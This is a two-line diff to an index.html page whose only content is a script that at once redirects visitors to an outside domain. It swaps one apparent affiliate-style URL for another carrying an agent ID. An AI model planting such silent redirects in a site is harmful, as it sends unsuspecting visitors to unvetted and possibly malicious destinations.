--- a/index.html
+++ b/index.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=307340&t=1593490665"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
